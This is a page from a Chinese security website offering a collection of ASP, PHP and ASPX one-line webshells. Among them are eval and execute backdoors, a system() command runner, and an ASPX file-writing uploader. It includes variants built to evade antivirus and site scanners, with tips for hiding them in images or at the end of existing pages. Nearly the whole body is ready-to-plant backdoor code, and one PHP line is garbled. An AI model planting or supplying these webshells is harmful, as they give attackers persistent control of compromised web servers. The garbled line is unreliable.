首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>網絡安全>文章內容
asp,php,aspx一句話集合
來源:http://www.expsec.com 作者:ExpSec 發布時間:2012-02-02  

推薦還是把一句話加進圖片里面去。

 

普通的php一句話:<?php @eval($_POST['r00ts']);?>

 

普通的asp一句話:<%eval(Request.Item["r00ts"],"unsafe");%>

 

aspx突破一流的:

<script language=VBScript runat=server>
dim da
set fso=server.createobject(“scripting.filesystemobject”)
path=request(“path”)
if path<>”" then
data=request(“da”)
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write “yes”
else
Response.Write “no”
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write “<form action=” method=post>”
Response.Write “<input type=text name=path>”
Response.Write “<br>”
Response.Write “當前文件路徑:”&server.mappath(request.servervariables(“script_name”))
Response.Write “<br>”
Response.Write “操作系統為:”&Request.ServerVariables(“OS”)
Response.Write “<br>”
Response.Write “WEB服務器版本為:”&Request.ServerVariables(“SERVER_SOFTWARE”)
Response.Write “<br>”
Response.Write “<textarea name=da cols=50 rows=10 width=30></textarea>”
Response.Write “<br>”
Response.Write “<input type=submit value=save>”
Response.Write “</form>”
</Script>

 

ASP一句話:<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>

 

PHP防殺放掃 一句話:<?php (])?> 

上面這句是防殺防掃的!網上很少人用!可以插在網頁任何ASP文件的最底部不會出錯,比如index.asp里面也是可以的!

 

因為加了判斷!加了判斷的PHP一句話,與上面的ASP一句話相同道理,也是可以插在任何PHP文件的最底部不會出錯!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>

 

無防下載表,有防下載表可嘗試插入以下語句突破的一句話

<%execute request("class")%><%'<% loop <%:%><%'<% loop <%:%><%execute request("class")%><%execute request("class")'<% loop <%:%>

 

備份專用<%eval(request("1")):response.end%>

 

asp一句話<%execute(request("1"))%>

 

 

 

aspx一句話:<scriptrunat="server">WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y("add6bb58e139be10");</script>

 

可以躲過雷客圖的一句話。

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject"Response",Responsems.AddObject"request", requestms.ExecuteStatement("ev"&"al(request(""1""))")%>

 

不用’<,>‘的asp一句話<scriptrunat=server>execute request("1")</script>

 

不用雙引號的一句話。<%eval request(chr(35))%>


 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·一句話木馬
·samcrypt.lib簡介
·教你輕松查看QQ空間加密后的好友
·web sniffer 在線嗅探/online ht
·Cisco PIX525 配置備忘
·SPIKE與Peach Fuzzer相關知識
·用Iptables+Fedora做ADSL 路由器
·檢查 Web 應用安全的幾款開源免
·Md5(base64)加密與解密實戰
·NT下動態切換進程分析筆記
·風險評估中的滲透測試
·QQ2009正式版SP4文本信息和文件
  相關文章
·常見 Webshell 的檢測方法及檢測
·淺談Ddos攻擊攻擊與防御
·淺談新型的sql注入測試
·Auto pentesting. Nmap, SSLscan
·Content-Type 防范 XSS 繞過
·PHP中的密碼學算法及其應用2-對
·web sniffer 在線嗅探/online ht
·利用PHP編程防范XSS跨站腳本攻擊
·網絡游戲安全小議(端游/頁游/手
·Web開發框架安全雜談
·記錄一次網站被黑抓馬記
·從真實故事說起 讀黑客戰術社會
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码